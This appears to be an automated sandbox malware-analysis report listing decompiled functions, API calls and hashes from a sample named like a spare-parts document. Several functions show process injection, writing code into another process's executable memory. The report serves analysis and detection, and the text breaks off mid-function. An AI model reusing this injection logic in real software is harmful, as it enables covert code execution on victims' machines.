                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02523F94 Relevance: 6.1, APIs: 4, Instructions: 107memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 66%
                                                                			E02523F94(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v9;
				char _v32;
				intOrPtr _t20;
				intOrPtr _t22;
				void* _t31;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t51;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				long _t61;
				void* _t66;
				intOrPtr _t69;
				void* _t78;

				_t78 = __fp0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = __edx;
				_t66 = __eax;
				_push(_t69);
				_push(0x25240da);
				_push( *[fs:eax]);
				 *[fs:eax] = _t69;
				_v9 = 0;
				 *0x256d334 =  *((intOrPtr*)(_v8 + 0x3c)) + _v8;
				 *0x256d33c = 0x50000000;
				do {
					 *0x256d33c =  *0x256d33c + 0x10000;
					_t20 =  *0x256d334; // 0x0
					_t22 =  *0x256d334; // 0x0
					 *0x256d338 = VirtualAlloc( *((intOrPtr*)(_t22 + 0x34)) +  *0x256d33c,  *(_t20 + 0x50), 0x3000, 0x40);
					if( *0x256d338 != 0) {
						VirtualFree( *0x256d338, 0, 0x8000);
						_t41 =  *0x256d334; // 0x0
						_t43 =  *0x256d334; // 0x0
						 *0x256d338 = VirtualAllocEx(_t66,  *((intOrPtr*)(_t43 + 0x34)) +  *0x256d33c,  *(_t41 + 0x50), 0x3000, 0x40);
					}
				} while ( *0x256d338 == 0 &&  *0x256d33c <= 0x30000000);
				E025243F8(_t66, 0x256d338, _v8,  *0x256d338, 0x256d33c, _t66, _t78,  &_v32);
				_t51 =  *0x2523864; // 0x2523868
				E025155FC(0x256d31c, _t51,  &_v32);
				_t31 =  *0x256d31c; // 0x0
				if(_t31 != 0) {
					 *0x256d340 = _t31;
					_t60 =  *0x256d328; // 0x0
					 *0x256d344 = _t60;
					_t61 =  *0x256d320; // 0x0
					WriteProcessMemory(_t66,  *0x256d338, _t31, _t61, 0x256d330);
					 *0x256d348 = E02523DDC(_t66, 0x256d340, E02523F6C, 0, 8);
					if( *0x256d348 != 0) {
						_v9 = 1;
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E025240E1);
				_t59 =  *0x2523864; // 0x2523868
				return E02515398( &_v32, _t59);
			}



















                                                                0x02523f94
                                                                0x02523f99
                                                                0x02523f9a
                                                                0x02523f9b
                                                                0x02523f9c
                                                                0x02523f9d
                                                                0x02523f9e
                                                                0x02523f9f
                                                                0x02523fa3
                                                                0x02523fa6
                                                                0x02523fb4
                                                                0x02523fb5
                                                                0x02523fba
                                                                0x02523fbd
                                                                0x02523fc0
                                                                0x02523fcd
                                                                0x02523fd2
                                                                0x02523fd8
                                                                0x02523fd8
                                                                0x02523fe5
                                                                0x02523fee
                                                                0x02523ffe
                                                                0x02524003
                                                                0x0252400f
                                                                0x0252401b
                                                                0x02524024
                                                                0x02524035
                                                                0x02524035
                                                                0x02524037
                                                                0x0252404f
                                                                0x0252405c
                                                                0x02524062
                                                                0x02524067
                                                                0x0252406e
                                                                0x02524070
                                                                0x02524075
                                                                0x0252407b
                                                                0x02524086
                                                                0x02524092
                                                                0x025240ac
                                                                0x025240b8
                                                                0x025240ba
                                                                0x025240ba
                                                                0x025240b8
                                                                0x025240c0
                                                                0x025240c3
                                                                0x025240c6
                                                                0x025240ce
                                                                0x025240d9

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,025240DA,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02523FF9
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040,00000000,025240DA,?,?,?,?,00000000,00000000,00000000), ref: 0252400F
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040,00000000,025240DA), ref: 02524030
                                                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,00000000,0256D330,?,?,?,00003000,00000040,00000000,025240DA), ref: 02524092
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 2022580353-0
                                                                • Opcode ID: 94fe4da41f4b0588800e95376328d19c44e597cebe2479fedcad02b606b902a7
                                                                • Instruction ID: 7b12422df6dde1c5f90ef5929a20ff0c0cb6bdf1402a59b3dabab76242f6995b
                                                                • Opcode Fuzzy Hash: 94fe4da41f4b0588800e95376328d19c44e597cebe2479fedcad02b606b902a7
                                                                • Instruction Fuzzy Hash: A7414770B52210AFE714CF5CC989F6A77F9FB8A700F5948A4E8009B280D378A8598B59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02523D14 Relevance: 3.1, APIs: 2, Instructions: 57memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 56%
                                                                			E02523D14(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _t11;
				char _t16;
				void* _t25;
				intOrPtr _t33;
				void* _t36;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_push(0);
				_push(0);
				_t25 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x2523d9a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E02514A98( &_v12, __edx);
				_t11 = _v12;
				if(_t11 != 0) {
					_t11 =  *((intOrPtr*)(_t11 - 4));
				}
				_t36 = VirtualAllocEx(_t38, 0, _t11 + 1, 0x3000, 0x40);
				E02514A98( &_v16, _t25);
				_t16 = _v16;
				if(_t16 != 0) {
					_t16 =  *((intOrPtr*)(_t16 - 4));
				}
				WriteProcessMemory(_t38, _t36, _t25, _t16 + 1,  &_v8);
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E02523DA1);
				return E025148C4( &_v16, 2);
			}













                                                                0x02523d17
                                                                0x02523d19
                                                                0x02523d1b
                                                                0x02523d20
                                                                0x02523d22
                                                                0x02523d26
                                                                0x02523d27
                                                                0x02523d2c
                                                                0x02523d2f
                                                                0x02523d37
                                                                0x02523d3c
                                                                0x02523d41
                                                                0x02523d46
                                                                0x02523d46
                                                                0x02523d59
                                                                0x02523d60
                                                                0x02523d65
                                                                0x02523d6a
                                                                0x02523d6f
                                                                0x02523d6f
                                                                0x02523d7a
                                                                0x02523d81
                                                                0x02523d84
                                                                0x02523d87
                                                                0x02523d99

                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02523D9A,?,?,?,?,00000000,00000000,00000000), ref: 02523D54
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02523D9A), ref: 02523D7A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID:
                                                                • API String ID: 645232735-0
                                                                • Opcode ID: 8be46509de255c9d1771f0b6fdd3927ebb4ac8043a8480a191f13cbaf45179c2
                                                                • Instruction ID: 1aa1bf5fdb8d1e2f84886fc0739fc2438e85ba612f5029d66827ed05ca3f9655
                                                                • Opcode Fuzzy Hash: 8be46509de255c9d1771f0b6fdd3927ebb4ac8043a8480a191f13cbaf45179c2
                                                                • Instruction Fuzzy Hash: F001DE317002157FF710DA61CC41FAEBBADEB86B40F5140B5F901EB2C0D678EE058A28
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02523DAC Relevance: 3.0, APIs: 2, Instructions: 28memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E02523DAC(void* __eax, long __ecx, void* __edx) {
				void* _t5;
				void* _t9;
				long _t10;
				void* _t11;
				SIZE_T* _t12;

				_push(__ecx);
				_t10 = __ecx;
				_t11 = __edx;
				_t5 = __eax;
				_t9 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40);
				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12);
				return _t9;
			}








                                                                0x02523db0
                                                                0x02523db1
                                                                0x02523db3
                                                                0x02523db5
                                                                0x02523dc7
                                                                0x02523dce
                                                                0x02523dda

                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,02523DF4), ref: 02523DC2
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,02523DF4), ref: 02523DCE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID:
                                                                • API String ID: 645232735-0
                                                                • Opcode ID: 2cd24f3412cda8af88afa488e7603ac8d661d4c6e5d900769bf4ba982289be09
                                                                • Instruction ID: 229121def21944372b031dad170760fc7dd014707a0ceb33782b05f7648905ba
                                                                • Opcode Fuzzy Hash: 2cd24f3412cda8af88afa488e7603ac8d661d4c6e5d900769bf4ba982289be09
                                                                • Instruction Fuzzy Hash: CFD09EA674722437E134216BAC45FA75E4DCBC77F5E1501B6F708EA1C1D4965C0541B8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02518252 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02518252(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E02515824(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E02515824(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

















                                                                0x0251825b
                                                                0x02518260
                                                                0x02518262
                                                                0x02518262
                                                                0x02518275
                                                                0x02518284
                                                                0x02518287
                                                                0x02518294
                                                                0x02518297
                                                                0x0251829c
                                                                0x0251829f
                                                                0x025182a1
                                                                0x025182ae
                                                                0x025182b1
                                                                0x025182b6
                                                                0x025182b9
                                                                0x025182bb
                                                                0x025182c4

                                                                APIs
                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02518275
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DiskFreeSpace
                                                                • String ID:
                                                                • API String ID: 1705453755-0
                                                                • Opcode ID: 2527c2e550787c50034af577a7ac8c6a75ac3b9f005c29b6c5fd5aa65144798f
                                                                • Instruction ID: c1c60b2177dfc4d4ab3b163ca15e0e6358e21712e75acca24cb12dfa1aaf2adc
                                                                • Opcode Fuzzy Hash: 2527c2e550787c50034af577a7ac8c6a75ac3b9f005c29b6c5fd5aa65144798f
                                                                • Instruction Fuzzy Hash: 1A11D2B5E00209AF9B44CF99C881DAFF7F9FFC8710B54C569A515EB254E6319E01CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251A9D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0251A9D0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E025148F4(_t10, _t18);
				}
				return E02514990(_t10, _t5 - 1,  &_v260, _t19);
			}







                                                                0x0251a9db
                                                                0x0251a9dd
                                                                0x0251a9ee
                                                                0x0251a9f3
                                                                0x0251a9f5
                                                                0x00000000
                                                                0x0251aa0d
                                                                0x00000000

                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0251A9EE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: f018570b5655bc878a934e5041b7a516a4510c90cded3bf1548f5733b6c703d6
                                                                • Instruction ID: ccd561dba8cd0024be9bad957b946762cf024689fb87f6c331da4ac23fe8d7c8
                                                                • Opcode Fuzzy Hash: f018570b5655bc878a934e5041b7a516a4510c90cded3bf1548f5733b6c703d6
                                                                • Instruction Fuzzy Hash: F3E0D87170021427E311A55CDC809FA735DBB98310F00017BB904C7380FDB0DD848AED
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251B950 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0251B950() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x252d7e4 = _v132;
					 *0x252d7e8 = _v144;
					 *0x252d7ec = _v140;
					if( *0x252d7e4 != 1) {
						 *0x252d7f0 = _v136;
					} else {
						 *0x252d7f0 = _v136 & 0x0000ffff;
					}
					return E02514B10(0x252d7f4, 0x80,  &_v128);
				}
				return _t7;
			}










                                                                0x0251b956
                                                                0x0251b95e
                                                                0x0251b965
                                                                0x0251b96b
                                                                0x0251b974
                                                                0x0251b97d
                                                                0x0251b989
                                                                0x0251b99f
                                                                0x0251b98b
                                                                0x0251b994
                                                                0x0251b994
                                                                0x00000000
                                                                0x0251b9b2
                                                                0x0251b9bd

                                                                APIs
                                                                • GetVersionExA.KERNEL32(?,0252C106,00000000,0252C11E), ref: 0251B95E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: 5e15e480d2339c5a0ab771d07fc057048f1225c943d7dcd42d86c8d401f13c00
                                                                • Instruction ID: 2b28f703d6a2aff5b5746decdcd5473e701d2a07ccc6b6c25161c1385419cf59
                                                                • Opcode Fuzzy Hash: 5e15e480d2339c5a0ab771d07fc057048f1225c943d7dcd42d86c8d401f13c00
                                                                • Instruction Fuzzy Hash: 0CF0F4B4A053028FD364DF28E540B15B7F0FB8A308F094D29A498C7388D738841EDB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251AA1C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 79%
                                                                			E0251AA1C(int __eax, signed int __ecx, int __edx) {
				char _v16;
				signed int _t5;
				signed int _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16 & 0x000000ff;
				}
				return _t5;
			}






                                                                0x0251aa1f
                                                                0x0251aa20
                                                                0x0251aa36
                                                                0x0251aa3e
                                                                0x0251aa38
                                                                0x0251aa38
                                                                0x0251aa38
                                                                0x0251aa44

                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0251C036,00000000,0251C24F,?,?,00000000,00000000), ref: 0251AA2F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: ee0b552feaacc8f8dd4fbef7b7a7d3414b5f3114e3be43053c5a9c5dca89adda
                                                                • Instruction ID: 2ef78e268492360b748ef5d38ce44a908b57b56b4a083ddbce0d035409e94b04
                                                                • Opcode Fuzzy Hash: ee0b552feaacc8f8dd4fbef7b7a7d3414b5f3114e3be43053c5a9c5dca89adda
                                                                • Instruction Fuzzy Hash: 16D05EA234E2603AB221515A6E84D7B5ADCDAC57B1F04443AF648C6241D210CC06E6B5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02519450 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02519450() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}




                                                                0x02519454
                                                                0x02519460

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID:
                                                                • API String ID: 481472006-0
                                                                • Opcode ID: 03fe08655c98b4df5ce1893cbd2058f766e1102da1784216b5b85247ca1c748c
                                                                • Instruction ID: acd4d98e93b090bb02e1841dacad9851e6e4c368538355c69837a1055a8986e6
                                                                • Opcode Fuzzy Hash: 03fe08655c98b4df5ce1893cbd2058f766e1102da1784216b5b85247ca1c748c
                                                                • Instruction Fuzzy Hash: 1DA0120080482111914033184C0213530846840630FC40B4068F8402D0E91D8170D4D7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025120F4 Relevance: .1, Instructions: 94COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 51%
                                                                			E025120F4(void* __eax, char* __edx) {
				char* _t103;

				_t103 = __edx;
				_t39 = __eax + 1;
				 *__edx = 0xffffffff89705f71;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
				_t37 = _t103 + 1; // 0x1
				return _t37;
			}




                                                                0x025120f5
                                                                0x025120f7
                                                                0x02512119
                                                                0x02512120
                                                                0x02512131
                                                                0x0251213c
                                                                0x0251214d
                                                                0x02512158
                                                                0x02512169
                                                                0x02512174
                                                                0x02512185
                                                                0x02512190
                                                                0x025121a1
                                                                0x025121ac
                                                                0x025121bd
                                                                0x025121c8
                                                                0x025121d9
                                                                0x025121e4
                                                                0x025121f5
                                                                0x025121fd
                                                                0x02512206
                                                                0x02512208
                                                                0x0251220c

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251D470 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0251D470() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x256d224 = E0251D444("VariantChangeTypeEx", E0251CFDC, _t91);
				 *0x256d228 = E0251D444("VarNeg", E0251D00C, _t91);
				 *0x256d22c = E0251D444("VarNot", E0251D00C, _t91);
				 *0x256d230 = E0251D444("VarAdd", E0251D018, _t91);
				 *0x256d234 = E0251D444("VarSub", E0251D018, _t91);
				 *0x256d238 = E0251D444("VarMul", E0251D018, _t91);
				 *0x256d23c = E0251D444("VarDiv", E0251D018, _t91);
				 *0x256d240 = E0251D444("VarIdiv", E0251D018, _t91);
				 *0x256d244 = E0251D444("VarMod", E0251D018, _t91);
				 *0x256d248 = E0251D444("VarAnd", E0251D018, _t91);
				 *0x256d24c = E0251D444("VarOr", E0251D018, _t91);
				 *0x256d250 = E0251D444("VarXor", E0251D018, _t91);
				 *0x256d254 = E0251D444("VarCmp", E0251D024, _t91);
				 *0x256d258 = E0251D444("VarI4FromStr", E0251D030, _t91);
				 *0x256d25c = E0251D444("VarR4FromStr", E0251D09C, _t91);
				 *0x256d260 = E0251D444("VarR8FromStr", E0251D108, _t91);
				 *0x256d264 = E0251D444("VarDateFromStr", E0251D174, _t91);
				 *0x256d268 = E0251D444("VarCyFromStr", E0251D1E0, _t91);
				 *0x256d26c = E0251D444("VarBoolFromStr", E0251D24C, _t91);
				 *0x256d270 = E0251D444("VarBstrFromCy", E0251D2CC, _t91);
				 *0x256d274 = E0251D444("VarBstrFromDate", E0251D33C, _t91);
				_t46 = E0251D444("VarBstrFromBool", E0251D3B0, _t91);
				 *0x256d278 = _t46;
				return _t46;
			}






                                                                0x0251d47e
                                                                0x0251d492
                                                                0x0251d4a8
                                                                0x0251d4be
                                                                0x0251d4d4
                                                                0x0251d4ea
                                                                0x0251d500
                                                                0x0251d516
                                                                0x0251d52c
                                                                0x0251d542
                                                                0x0251d558
                                                                0x0251d56e
                                                                0x0251d584
                                                                0x0251d59a
                                                                0x0251d5b0
                                                                0x0251d5c6
                                                                0x0251d5dc
                                                                0x0251d5f2
                                                                0x0251d608
                                                                0x0251d61e
                                                                0x0251d634
                                                                0x0251d64a
                                                                0x0251d65a
                                                                0x0251d660
                                                                0x0251d667

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0251D479
                                                                  • Part of subcall function 0251D444: GetProcAddress.KERNEL32(00000000), ref: 0251D45D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                • API String ID: 1646373207-1918263038
                                                                • Opcode ID: 6a9ecd4c59beb93e45ca2e530ab7a57b21b82d84fc55fdbbaf64aacb01fd8157
                                                                • Instruction ID: 5ca0a67ec224d47f227cdb59978af64349f34345b4388b3fa193cdd635549488
                                                                • Opcode Fuzzy Hash: 6a9ecd4c59beb93e45ca2e530ab7a57b21b82d84fc55fdbbaf64aacb01fd8157
                                                                • Instruction Fuzzy Hash: A041F761A472056B72086F6DB4054BB77FAF6C4710360881AF4088B745EEF1FD96AE2E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02512EC8 Relevance: 27.1, APIs: 9, Strings: 9, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02512EC8(CHAR* __eax, void* __ecx, intOrPtr* __edx) {
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t29;
				CHAR* _t30;
				CHAR* _t31;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t36;
				CHAR** _t37;

				_t33 = __edx;
				_t23 = __eax;
				L2:
				while(1) {
					if( *_t23 != 0 &&  *_t23 <= 0x20) {
						_t23 = CharNextA(_t23);
						continue;
					}
					if( *_t23 != 0x22 || _t23[1] != 0x22) {
						_t35 = 0;
						 *_t37 = _t23;
						while( *_t23 > 0x20) {
							if( *_t23 != 0x22) {
